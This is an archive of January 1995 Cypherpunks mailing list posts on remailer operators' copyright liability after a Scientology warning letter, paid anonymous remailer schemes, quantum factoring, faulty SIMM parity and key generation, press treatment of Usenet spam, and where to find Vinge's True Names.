my first instinct (were i running a remailer) would be to ignore it, on grounds that i wouldn't examine any mail passing through. The people who keep logs, yes, are in more danger than those who don't. Eric From greg at ideath.goldenbear.com Thu Jan 5 00:25:20 1995 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Thu, 5 Jan 95 00:25:20 PST Subject: Remailers, law and the Church of Scientology Message-ID: <199501050035.AA02970@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- AvI Harris Baumstein writes: >> clients' property rights. Courts are holding such >> contributory infringers liable. Two examples are: Sega >> Enterprises Ltd. v. Maphia BBS, 30 U.S.P.Q. 2d 1921 (N.D. >> Cal. 1994) and Playboy Enterprises v. Frena, 839 F. Supp. >> 1152 (M.D. Fla. 1993). >what of these cases? is this just an example of typical lawyerly >intimidation tactics? Neither case is particularly similar to the remailer situation. _Maphia_ concerned a business which sold $350 boxes to copy SEGA programs from and to ROM cartridges; they also sold access to their BBS which held unlicensed copies of SEGA games. The court held that the copying devices had no purpose other than to contribute to infringement, and that when SEGA programs were uploaded to the BBS, the upload was made with the knowledge of the defendants. _Frena_ involved a BBS operator who made copyrighted pictures from Playboy available on his BBS; Playboy trademarks were removed from the pictures prior to posting. Access to the BBS was only available to people who paid for access, or who otherwise did business with the defendant. The court's discussion about the defendant's mental state in _Frena_ consists of a single sentence, and a cite to Jay Dratler, Jr., "Intellectual Property Law: Commercial Creative, and Industrial Property", $ 6.01[3] at 6-15(1991). The court seems to be addressing direct, not contributory infringement. (I don't have Dratler available easily right now so I dunno what it says.) 
_Maphia_ does cite text from _Casella v. Morris_ 820 F.2d 362 (11th Cir. 1987): "'[o]ne who, with knowledge of the infringing activity, induces, causes or materially contributes to the infringing conduct of another' may be held liable as a contributory infringer." (quoting from _Gershwin Publishing Corp. v. Columbia Artists Management, Inc._, 443 F.2d 1159,1162 (2nd Cir. 1971). I don't think the cases cited stand for what the Church's attorney says they stand for. I'm not convinced that the "contributory infringement" doctrine can be reasonably applied to remailer operators; and I'm not sure that remailer operators have the sort of mental state (knowledge) required to create liability. The letter to operators may be part of a strategy to establish knowledge of the potential for misuse, to later prevent operators from claiming a lack of knowledge. I'm not sure that a vague warning "someone might use your service to infringe a copyright" is strong enough to establish that sort of knowledge. As a remailer operator, I don't see a good way to eliminate infringing uses without also eliminating non-infringing uses; the crazy politics around this Scientology stuff makes it seem like the perfect place for people to use remailers. I also think the non-commercial and political nature of postings to the Scientology groups may make a fair-use analysis turn out differently than in _Maphia_ and _Frena_; both defendants tried a fair use argument, and both lost. On the other hand, I'm a law student, not an attorney, and the person who wrote that letter certainly knows more about law in general and about copyright than I do. I may be totally hosed. Coincidentally or not, I had a long chat today with the sysadmin of the system immediately upstream from mine. He said, out of the blue, "So .. you run a remailer?". In the past he has been privacy-friendly and anon-friendly, and seems to remain so today, but the timing was a little peculiar. 
I explained about the remailers and told him how to get Raph's list and about alpha.c2.org and all the rest of it. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 -----END PGP SIGNATURE----- From lmccarth at ducie.cs.umass.edu Thu Jan 5 00:59:11 1995 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Thu, 5 Jan 95 00:59:11 PST Subject: C'punks Economist Fan Club Message-ID: <199501050904.EAA09785@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- > Why is it that so many cypherpunks like the economist? The Economist is my favorite magazine (my parents' too). I don't read it regularly, but that has more to do with my being busy than anything else. It succeeds in providing fairly balanced in-depth coverage of international news that isn't terribly Amerocentric or Anglocentric. At worst it's G7-centric, but I think that's entirely reasonable ;) It's witty, politically aware, relatively technically savvy. The articles exhibit a healthy (IMHO) cynicism about what happens and why, yet maintain some idealism about what should happen. It's not perfect, but it's difficult to imagine surpassing it. I recently read an interview with Bill Gates in which he was asked which periodicals he reads. His first response was: "The Economist, every page". -L. Futplex McCarthy; PGP key by finger or server "The objective is for us to get those conversations whether they're by an alligator clip or ones and zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. 
Freeh - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service -----END PGP SIGNATURE----- From norm at netcom.com Thu Jan 5 01:07:06 1995 From: norm at netcom.com (Norman Hardy) Date: Thu, 5 Jan 95 01:07:06 PST Subject: another factoring thing. . . . Message-ID: At 11:04 PM 12/30/94, camp at industrial.com wrote: >Hey did anyone see the article, some time ago in Science News (May 14, >1994) there was this article on using a 'quantum computer'. Through >the marvels of quantum mechanics it is theoretically possible to >build a computer that would be really good at factoring large numbers >such as the ones used in RSA. This combined with team sieving could >possibly be used to significantly reduce the time required to factor >a key. Any thoughts, did anyone else see the article, has there already >been a really stimulating discussion that I missed? Well let me know. .... I think that that kind of quantum computer is much less likely to be built to impact RSA style crypto, than some revolutionary sort of factoring algorithm. It is not clear whether the tolerances required for the quantum computer can ever be met and it is not entirely clear if the quantum principles are correct. I don't entirely rule it out however. 
From rah at shipwright.com Thu Jan 5 04:20:20 1995 From: rah at shipwright.com (Robert Hettinga) Date: Thu, 5 Jan 95 04:20:20 PST Subject: No Subject Message-ID: Factoids lifted from apple-internet-users at medraut.apple.com: >Jonathan P. Sullivan wrote : > Here are some other stats culled from an article in the 12/22/94 edition of > Washington Technology: > >* Approximately 300,000 attacks have been made on DoD computers >* Hackers have successfully compromised 350 DoD computer systems >* 88% of all information warfare attacks succeed >* 96% of those successful attacks are never noticed >* Only 4% of those noticed are reported Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923 From nelson at crynwr.com Thu Jan 5 04:29:02 1995 From: nelson at crynwr.com (Russell Nelson) Date: Thu, 5 Jan 95 04:29:02 PST Subject: Remailer Abuse In-Reply-To: <9501050453.AA10198@tadpole.tadpole.com> Message-ID: From: db at Tadpole.COM (Doug Barnes) Date: Wed, 4 Jan 1995 22:11:11 -0600 (CST) Heh. An anonymous remailer paid for by credit card... there'd have to be an additional level of indirection for it to work, which would make the methods for tracking those who don't pay quite problematic. Why wouldn't it work? I plan on doing this, and I'll be selling lots of things besides a remailer, including lots of email traffic. So there won't be any effective way to find out who paid for access to my remailer. Sure, I'll know who used it, but I'm not going to keep that information. (Yes, yes, FV says that I have to keep records of who bought what, but I'll label all my information with a random number, that simply says that X bought information worth Y, not *what* information.) 
And if you don't trust a remailer operator, then you won't use it. -- -russ http://www.crynwr.com/crynwr/nelson.html Crynwr Software | Crynwr Software sells packet driver support | ask4 PGP key 11 Grant St. | +1 315 268 1925 (9201 FAX) | What is thee doing about it? Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress? From perry at imsi.com Thu Jan 5 05:24:23 1995 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 5 Jan 95 05:24:23 PST Subject: Siegel and Lewis In-Reply-To: Message-ID: <9501051324.AA16313@snark.imsi.com> Michael Conlen says: > As I understand it, the government owns a portion of the internet. Nope. Sorry. They don't. > Does anyone have any information on what grounds Siegel and Lewis > plan to use for legislation? Peter Lewis is a reporter, and to my knowledge has no plans to lose his job by lobbying for legislation. I am unaware of what his opinions on this topic might be. My only beef with him is that his stories tend to be full of inaccuracies. This morning's, for instance, gave the impression that there are no unpatented algorithms available to do high-quality compression -- when of course, there are many. Perry From jthomas at access.digex.net Thu Jan 5 05:50:35 1995 From: jthomas at access.digex.net (Joe Thomas) Date: Thu, 5 Jan 95 05:50:35 PST Subject: Remailer Abuse In-Reply-To: Message-ID: On Thu, 5 Jan 1995, Russell Nelson wrote: > From: db at Tadpole.COM (Doug Barnes) > Heh. An anonymous remailer paid for by credit card... there'd > have to be an additional level of indirection for it to work, > which would make the methods for tracking those who don't pay > quite problematic. > Why wouldn't it work? I plan on doing this, and I'll be selling lots > of things besides a remailer, including lots of email traffic. So > there won't be any effective way to find out who paid for access to my > remailer. 
Another thought: why couldn't you sell a book of "stamps" -- Magic Money tokens -- and get paid for them using First Virtual? This would get around two problems: the lack of anonymity using First Virtual, and the fairly high 29-cent-per-transaction fee. You could sell a book of twenty remailer stamps for a dollar, or something. I'd buy. And it wouldn't make it too easy for people to use remailers without paying. FV will still take an account away from someone who denies legitimate charges too many times. I guess there is the problem of Chaum's patents (and RSA's). Is there anyplace where neither set of patents is valid, or where they'd be practically unenforceable? Joe From jya at pipeline.com Thu Jan 5 07:05:49 1995 From: jya at pipeline.com (John Young) Date: Thu, 5 Jan 95 07:05:49 PST Subject: NYT on $GIF Message-ID: <199501051505.KAA06613@pipe4.pipeline.com> Peter Lewis writes today on Compuserve and Unisys grub for royalties on GIF. Perry has noted its sty, java-eyely. For email copy send blank message with subject: GIF_nip From nobody at CSUA.Berkeley.EDU Thu Jan 5 08:51:05 1995 From: nobody at CSUA.Berkeley.EDU (Tommy the Tourist (Anon User)) Date: Thu, 5 Jan 95 08:51:05 PST Subject: _Why_ the print media doesn't like Usenet Message-ID: <199501051651.IAA24155@soda.CSUA.Berkeley.EDU> As many of you know, recent articles and editorials in the nation's main newspapers (_New_York_Times_ and the _Chicago_Tribune_ to name just two) have presented shockingly distorted accounts of the infamous Canter & Siegel Usenet spam. Ordinary Usenetters, outraged at the shocking abuse of the internet by Canter & Siegel, were transformed into "network terrorists" in these editorials. 
The attorneys, who have haughtily expressed their determination to repeatedly inconvenience millions of Usenet readers by flooding Usenet newsgroups with unsolicited advertisements, were portrayed as the innocent victims of anti-business "vigilantes" bent on terrorizing the attorneys after their widespread Usenet spam last year. The articles also included numerous serious technological inexactitudes which supported the distorted conclusions of the articles. The articles called for increased government regulation of the internet in order to thwart the alleged abuses. Determined efforts by Usenetters to educate the print media into presenting a more balanced (and, I might add, less disingenuous point of view) have been in vain. It seems reasonable to point out the following facts: 1. It has not been unknown for powerful individuals in newspapers (such as editors and owners) to manipulate articles for political purposes. 2. Usenet has often been highly critical of the print media, especially editorials which disagreed with strongly held Usenet views and articles which contained erroneous information. This criticism may have been seen by the print media as damaging. 3. From time to time articles published in newspapers have been posted (sometimes anonymously) to various newsgroups. This has denied the print media of revenue since readers only had to turn to Usenet to read especially sensationalist articles. 4. In the past, the print media has held a monopoly on detailed news. Sure, television could bring news stories instantly, but for detail one had to turn to the newspaper. Usenet and the internet are capable of providing very detailed information rapidly and on demand, changing instantly as conditions change. It is a very real competitor. 5. Government regulation would seriously hurt Usenet. Censorship (like an FCC censor) and regulation of anonymous remailers would result in increased legal liability on the internet. 
Holding Usenet posters and other providers of information liable for the accuracy and tastefulness of their information would make many people think twice before making their information available. This would eliminate not only inaccurate and tasteless information, but it would also greatly hinder the flow of even accurate information. This would put the print media on a more even footing. These facts together suggest that it might be to the advantage of the print media to call for government regulation. Once this is realized, the behavior of these newspapers can be better understood, and action can be taken against them: 1. Misleading information in the print media about Usenet must be widely disseminated so as to damage the reputations of newspapers that print inaccurate accounts and encourage them to get their facts straight the next time around. 2. The print media's self-interest in government regulation of Usenet must be pointed out, both to the public and to law-makers so as to reduce the effectiveness of their pleas. 3. Usenet should seek the support of the media (especially rivals like TV media that have less to lose from Usenet) to obtain favorable and anti-regulatory publicity. -> If you found this article interesting, please feel free to distribute widely. <- ------------ To respond to the sender of this message, send mail to remailer at soda.berkeley.edu, starting your message with the following 8 lines: :: Response-Key: the-clipper-key ====Encrypted-Sender-Begin==== MI@```%I^&2?(E+YR'QAJ3&+D2`UAI&EZX\# M%D0S6>LX!B&XC`CI2S9?]$AN7*P9K`)Q4JT_V`>$K2Z,T(@` ====Encrypted-Sender-End==== From jpb at gate.net Thu Jan 5 11:11:06 1995 From: jpb at gate.net (jpb at gate.net) Date: Thu, 5 Jan 95 11:11:06 PST Subject: Remailer postage Message-ID: <199501051802.NAA22909@seminole.gate.net> Russ, Where can I get the Magic Money software? I'm also interested in a combination FV/MM approach to anonymous postage. 
I'm still waiting to get my linux box set up (hassle with client paying the bill and all that fun stuff) but am considering starting a remailer once I get the site set up. I am concerned about the ethics of having a paymailer feed into the free remailer soup - how would their operators react if I'm effectively making money (no matter how little) off of them? In the interest of preserving anonymity, perhaps there should be a set postage rate - that way someone could use a digital stamp anywhere, helping to confuse the audit trail. I'm not sure if I want to get involved in the hassles of redemption though. It would probably become a major hassle for all the operators to have to do that much accounting on a regular basis. jpb at gate.net finger for pgp and ripem keys From nelson at crynwr.com Thu Jan 5 11:14:40 1995 From: nelson at crynwr.com (Russell Nelson) Date: Thu, 5 Jan 95 11:14:40 PST Subject: Remailer postage In-Reply-To: <199501051802.NAA22909@seminole.gate.net> Message-ID: From: jpb at gate.net Date: Thu, 5 Jan 1995 13:02:57 -0500 (EST) I am concerned about the ethics of having a paymailer feed into the free remailer soup - how would their operators react if I'm effectively making money (no matter how little) off of them? There is no ethical problem. How do they know someone isn't making money off them already? If they haven't considered that, they should. -- -russ http://www.crynwr.com/crynwr/nelson.html Crynwr Software | Crynwr Software sells packet driver support | ask4 PGP key 11 Grant St. | +1 315 268 1925 (9201 FAX) | What is thee doing about it? Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress? From tcmay at netcom.com Thu Jan 5 11:50:51 1995 From: tcmay at netcom.com (Timothy C. 
May) Date: Thu, 5 Jan 95 11:50:51 PST Subject: Remailer postage In-Reply-To: <199501051802.NAA22909@seminole.gate.net> Message-ID: <199501051942.LAA07959@netcom8.netcom.com> jpb at gate.net wrote: > I am concerned about the ethics of having a paymailer feed into the free > remailer soup - how would their operators react if I'm effectively making money > (no matter how little) off of them? I can't speak for others, but making money off remailing is a GOOD THING. If other remailers wish to give their services away for free, so be it. There will likely be an ecology of remailers with different fee schedules, different technical capabilities, and different policies. Personally, I think that "free remailers" will always be with us, but will come and go, as spammers and the like abuse them. The invisible hand will of course choose some and reject others. And a for-pay remailer is not making money "off them" (the other remailers), as the paying customer is the one who is making the choice of which remailers to use, which to pay digital postage on, etc. [Comment: I see disdainful comments here about the profit motive, about for-pay services, etc. I urge folks to carefully think about this point. Services that are "free" are actually paid for by someone, in various ways and for various motivations. Some things are worth paying for, some are not. Any customer who pays for remailing has made an uncoerced, voluntary decision that his interests are better serviced by paying for remailing than by using a free remailer. Sounds fair to me.] --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. 
Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From danisch at ira.uka.de Thu Jan 5 12:56:32 1995 From: danisch at ira.uka.de (Hadmut Danisch) Date: Thu, 5 Jan 95 12:56:32 PST Subject: Are 2048-bit pgp keys really secure ? Message-ID: <9501052056.AA24402@elysion.iaks.ira.uka.de> > A somewhat disturbing trend has appeared in the low-end cost-sensitive PC > SIMM market. Some supposedly 9-bit SIMMs are actually 8-bit SIMMs plus > a parity generator. This means that the parity checking is essentially > subverted, because the parity bit is generated from the stored contents > of memory at read time, rather than the stored contents when it was > written to. As such, NO bit errors are detected. So why not do a cheap trick: After the small primes check calculate a CRC checksum over the number. Then do the primality check. If it is a prime, store it together with the CRC. The CRC can be checked for every use of the number. (PGP encrypts the secret key and therefore it generates a CRC for the encrypted packet. But this CRC is generated after the primality check.) We already had some SIMM modules with bit errors. They were detected by a parity check. If cheap pc simms don't have a real parity bit, the probability of having such a bug isn't as low as 10^-40. If cheap parity-less simms are available they get sold (cheap and expensive). Hadmut BTW: Some weeks ago they found motherboards with falsified cache rams: They had just the normal DIL-ICs and the normal pins, but the plastic of the ICs didn't contain a chip. The BIOS was modified to give out a message about a good cache ram check at boot time. 
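The checksum-before-primality-test scheme from Hadmut Danisch's message above, sketched in Python as an added example (not code from the post or from PGP). CRC-32, Miller-Rabin and every name below are assumptions made for the illustration, and the memory fault is simulated by flipping one bit.

```python
import secrets
import zlib
from dataclasses import dataclass, replace


def small_primes(limit=2000):
    """Odd primes below `limit` (sieve of Eratosthenes) for the cheap pre-check."""
    flags = bytearray([1]) * limit
    flags[0:2] = b"\x00\x00"
    for i in range(2, int(limit ** 0.5) + 1):
        if flags[i]:
            flags[i * i::i] = bytearray(len(range(i * i, limit, i)))
    return [i for i in range(3, limit) if flags[i]]


SMALL_PRIMES = small_primes()


class MemoryFault(Exception):
    """The number no longer matches the CRC taken when it was generated."""


def crc_of(n, nbytes):
    """CRC-32 over the fixed-width big-endian encoding of n."""
    return zlib.crc32(n.to_bytes(nbytes, "big"))


def miller_rabin(n, rounds=40):
    """Probabilistic primality test; error probability at most 4**-rounds."""
    if n < 4:
        return n in (2, 3)
    if n % 2 == 0:
        return False
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for _ in range(rounds):
        a = secrets.randbelow(n - 3) + 2          # witness in [2, n-2]
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False                           # a proves n composite
    return True


@dataclass(frozen=True)
class GuardedPrime:
    value: int
    nbytes: int
    crc: int

    def use(self):
        """Return the prime only if it still matches its stored CRC."""
        if crc_of(self.value, self.nbytes) != self.crc:
            raise MemoryFault("prime changed since it was tested")
        return self.value


def generate_guarded_prime(bits=512):
    """Sieve, checksum, then test, in the order the message proposes (bits >= 16)."""
    nbytes = (bits + 7) // 8
    while True:
        cand = secrets.randbits(bits) | (1 << (bits - 1)) | 1
        if any(cand % p == 0 for p in SMALL_PRIMES):
            continue
        crc = crc_of(cand, nbytes)                 # taken BEFORE the long test
        if not miller_rabin(cand):
            continue
        if crc_of(cand, nbytes) != crc:            # changed while being tested
            continue
        return GuardedPrime(cand, nbytes, crc)


def simulate_bit_flip(gp, bit):
    """Constructed fault: same stored CRC, one bit of the value inverted."""
    return replace(gp, value=gp.value ^ (1 << bit))


def is_intact(gp):
    try:
        gp.use()
        return True
    except MemoryFault:
        return False


if __name__ == "__main__":
    p = generate_guarded_prime(512)
    print("fresh prime intact:  ", is_intact(p))
    print("after one bit flip:  ", is_intact(simulate_bit_flip(p, 17)))
```

Because the CRC is recorded before the expensive test and rechecked at every use, a value that was prime when tested but has since changed in memory is rejected instead of being used as a key factor.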
From db at Tadpole.COM Thu Jan 5 13:03:52 1995 From: db at Tadpole.COM (Doug Barnes) Date: Thu, 5 Jan 95 13:03:52 PST Subject: Remailer postage In-Reply-To: <199501051802.NAA22909@seminole.gate.net> Message-ID: <9501052103.AA23382@tadpole.tadpole.com> I strongly agree with Tim that one should not look down at for-profit anonymizing services. This is the _only_ way I see to establish and maintain reliable service and avoid spamming and denial of service. It's also the only way such a service can scale if it becomes suddenly popular -- if there's no increased revenue, it's going to be harder to get more h/w and bandwidth. Even if one had a heart of gold and purely charitable instincts, one would eventually come to the conclusion that such a service operates better if users are paying for it. And this is even before we address matters like the benefits of competition. Doug From mnemonic at eff.org Thu Jan 5 13:27:04 1995 From: mnemonic at eff.org (Mike Godwin) Date: Thu, 5 Jan 95 13:27:04 PST Subject: Warning letter from Co$. [any comments ?] In-Reply-To: <199501050801.AAA18013@largo.remailer.net> Message-ID: <199501052127.QAA09356@eff.org> Actually, civil copyright infringement liability doesn't turn on knowledge. You can be an infringer even if you don't know. Criminal copyright infringement requires a guilty mental state, so *that* you have to know. > From: Avi Harris Baumstein > > i know there has been much chatter on this subject, but are there > truly any precedents that could hold on the anonymous distribution of > copyrighted material? > > Cubby v. Compuserve is relevant here, as well as that bookstore case > in the 50's that I never remember the name of. Mike G., can you help > me out on this one? > > These cases are about other kinds of wrongs (libel in one and > obscenity (?) in the other), but copyright violation doesn't seem to > have any particular features to set it apart from the basic > principle of these. 
Namely, if you know, you're responsible; if you > don't, you're not. This, you all realize no doubt, is a gross > simplification of a long chain of reasoning. > > what > exactly constitutes a trade secret, and what sort of laws apply? > > The short answer is that if you didn't sign a trade secret agreement > or are party to one by some other relationship (such as agency), then > a trade secret that comes your way is no secret any more. > > > clients' property rights. Courts are holding such > > contributory infringers liable. Two examples are: Sega > > Enterprises Ltd. v. Maphia BBS, 30 U.S.P.Q. 2d 1921 (N.D. > > Cal. 1994) and Playboy Enterprises v. Frena, 839 F. Supp. > > 1152 (M.D. Fla. 1993). > > what of these cases? is this just an example of typical lawyerly > intimidation tactics? > > I have personal experience with the first case. It was a local BBS > run by a friend of a friend, and I got involved a year ago right after > the seizure. (It was, BTW, a _civil_ seizure of a BBS, not criminal.) > I believe the case settled out of court. There were court documents > approving the seizure however; I don't know if these set precedent or > not. I suspect not, because the action was entirely _ex parte_ (Latin > for one-sided). Mike, again? Other legal folk? > > I know nothing about the second one. > > nhow do you remailer-ops plan to react? my first > instinct (were i running a remailer) would be to ignore it, on grounds > that i wouldn't examine any mail passing through. > > The people who keep logs, yes, are in more danger than those who don't. > > Eric > From s675570 at aix1.uottawa.ca Thu Jan 5 13:45:27 1995 From: s675570 at aix1.uottawa.ca (Angus Patterson) Date: Thu, 5 Jan 95 13:45:27 PST Subject: True Names Message-ID: I've been trying to get True Names by Vernor Vinge, and have been told it's out of print (like most good cypunk ), does anybody have it scanned? I realize this is without permission, so does anybody have Vinge's address? 
(e-mail or otherwise) or could anybody ask him? Btw, does he have any other crypto/anonymity related stories? Thanks in advance. From tcmay at netcom.com Thu Jan 5 13:49:56 1995 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 5 Jan 95 13:49:56 PST Subject: Remailer postage In-Reply-To: <9501052103.AA23382@tadpole.tadpole.com> Message-ID: <199501052148.NAA07203@netcom5.netcom.com> Doug Barnes wrote: > I strongly agree with Tim that one should not look > down at for-profit anonymizing services. This is the > _only_ way I see to establish and maintain reliable > service and avoid spamming and denial of service. > It's also the only way such a service can scale if > it becomes suddenly popular -- if there's no increased > revenue, it's going to be harder to get more h/w and > bandwidth. Indeed, the problems Julf & Company are having in getting adequate CPU power is illustrative. I see Julf saying he desperately needs some more computer power (this was a few months back) and I see others making the same tired old calls for "donations." (I say tired because requests that some people make contributions to effectively pay for the services used freely by others are rarely very effective....look to the sorry state of public broadcasting "begathons" for one example.) Instead of pointless beggings of the form "If only everyone who used Julf's service would send him $5," a pay-per-use system is much more scalable, and "closes the loop" on who pays. To wit, those that use the service, pay. Those that don't, don't. (I understand that Russ Nelson has experience in the shareware business, so he may know how many people send in their voluntary contributions. My understanding is that it's a tiny fraction, and that few shareware authors ever make much money. 
I've talked to some of them, and they consider shareware a failed experiment, except for new products trying to break into crowded markets, where the "shareware" label is just a facade for essentially giving it away in exchange for fame and eventual fortune if the product goes commercial.) > Even if one had a heart of gold and purely charitable > instincts, one would eventually come to the conclusion > that such a service operates better if users are > paying for it. And this is even before we address matters > like the benefits of competition. Precisely. A for-pay remailer can also be pressured by customers to enhance services, not take the remailer down for frivolous reasons, etc. It's real hard to ask a "charityware" remailer to honor commitments, add features, etc. Simple economics, and free market anarchy. Nobody here is proposing that fees be set (how could we?), that free remailers be banned (how?), etc. Those that want to give away their products are free to do so, just as those who want to charge $25 per remailing are free to do so. Free remailers will have a place, but will likely get "discovered" by spammers and by those who see no costs in adding it to their remailer chains. Hence, overuse. (More precise than "overuse": crowding, poor service, flakiness, etc.) Just like anything else in economics. The users ("the market") will largely determine how it all shakes out. There are fortunately no government agencies in any of the countries I know of that claim to be able to set fee schedules, ban "price gouging," ban "underpricing," or regulate remailers in any practical way. (Such moves may someday come, but that's another topic.) --Tim -- .......................................................................... Timothy C.
May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From wcs at anchor.ho.att.com Thu Jan 5 14:08:40 1995 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Thu, 5 Jan 95 14:08:40 PST Subject: Remailer Abuse Message-ID: <9501052114.AA03759@anchor.ho.att.com> Russ Nelson writes: > Heh. An anonymous remailer paid for by credit card... > Sure, I'll know who used it, but I'm not going to keep that > information. (Yes, yes, FV says that I have to keep records of who > bought what, but I'll label all my information with a random number, > that simply says that X bought information worth Y, not *what* > information.) And if you don't trust a remailer operator, then you > won't use it. I'd be worried about a couple of issues - one is just the transaction cost - can you successfully market remailer use at a buck a shot or whatever you'd be charging beyond FV's 29c stamp, or would you have some convenient way to aggregate bill? Beyond that, though, are some traffic analysis problems - remailers require a fair bit of traffic to be useful, and unless you receive a reasonable amount of encrypted traffic, and support encrypted email for purchasing remailer service and other merchandise, an eavesdropper would have a fairly good source of traffic data on your remailer users, especially since buying and using remailer service requires two messages within an hour or so. An alternative billing mechanism, which wouldn't use Chaum-patented cash, would be to sell a bunch of one-shot random-number tokens. 
When you sell the tokens, you add them to the database of valid tokens, and when one comes in on a message you delete it. This allows you to sell more than one message or service-period per FV transaction, and separates the purchase and use by a longer time, without adding the need for record-keeping based on the user's ID. It obviously does require encrypted reply messages. Another variant is for the user to send you a bunch of tokens along with the purchase, which you store. Blind signatures would improve the security of this process, but require more computation and may involve Chaum's patents. In this case, the message from the client to you would be encrypted, but you wouldn't have to send a reply, so the request could come in anonymously. Bill From tcmay at netcom.com Thu Jan 5 14:32:10 1995 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 5 Jan 95 14:32:10 PST Subject: True Names In-Reply-To: Message-ID: <199501052231.OAA11745@netcom5.netcom.com> Angus Patterson wrote: > > I've been trying to get True Names by Vernor Vinge, and have been told it's > out of print (like most good cypunk ), does anybody have it scanned? > I realize this is without permission, so does anybody have Vinge's address? > (e-mail or otherwise) or could anybody ask him? Btw, does he have any other > crypto/anonymity related stories? Thanks in advance. I see copies in used bookstores often. It's in the collection "True Names and Something-or-other" and was in print until recently. I also have the Bluejay edition, with an afterword by Marvin Minsky. Check around any large used bookstore. It's too long for reasonable scanning (and I have both a scanner and an OCR program, and scanned-in one or more of the papers at the soda site) and would bring on heat. Besides, it's just too easy to find in bookstores or libraries, regardless of being "out of print." As to other such stories, "The Ungoverned" is interesting.
And of course the "Peace War" and "Marooned in Realtime" (aka "Mushrooms in Real Slime") novels have some futurist items of interest. (In particular, I think of public key crypto as "bobbling" data inside, encasing data in a silvery sphere unbreachable by outsiders. I mentioned this to Vinge once and he was amused.) Finally, his Hugo-winning novel, "A Fire Upon the Deep," has some casual mentions of crypto, including the odd speculation that those in the know in the distant future don't really trust public key crypto. Death to vermin! --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From rah at shipwright.com Thu Jan 5 14:40:11 1995 From: rah at shipwright.com (Robert Hettinga) Date: Thu, 5 Jan 95 14:40:11 PST Subject: GIF_nip Message-ID: ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923 From erc at s116.slcslip.indirect.com Thu Jan 5 14:40:30 1995 From: erc at s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin]) Date: Thu, 5 Jan 95 14:40:30 PST Subject: available NNTP posting sites? Message-ID: Does anyone have a list of NNTP sites that take connections from anyone for posting? My regular NNTP site seems to be hosed, or something, and I have a post that needs to get out, but also needs to originate from this site.
Thanks in advance :) -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 801/534-8857 voicemail 801/460-1883 digital pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi ** PGP encrypted email preferred! ** "What's the use of distant travel if only to discover - you're homeless in your heart." --Basia, "Yearning" From meconlen at IntNet.net Thu Jan 5 14:44:10 1995 From: meconlen at IntNet.net (Michael Conlen) Date: Thu, 5 Jan 95 14:44:10 PST Subject: Siegel and Lewis In-Reply-To: Message-ID: On Wed, 4 Jan 1995, Jonathan Cooper wrote: > > is how can they regulate what private business and citizens do with > > their Fiber Optics, ISDN lines, telephone lines, and computers. If the > > They already do - look at the regulations on telcos, power companies, > water companies, cellular/paging companies, lawyers, doctors, etc. A big difference between the 'net and some of the above, is that the net has been around in a very large presence (internationally) before the laws are being introduced, whereas paging and cellular service didn't exist. As far as lawyers and doctors and lawyers, one of the big things the government does is protect against quacks. Not too many people are going to argue with this. The government wants to protect us from speech in the case of the 'net, well there are quite a few people who are going to stand up for their first amendment rights. If you want your own communication service, you can buy it. whether you use fiber based WAN's or go straight for satellite service, used by companies such as Holiday Inn, or Circuit City. You can exchange any information you want. I think the important thing to remember is that net access is not a right. My service provider has the right to give service to whom they please, as long as race, sex, or creed are not deciding factors.
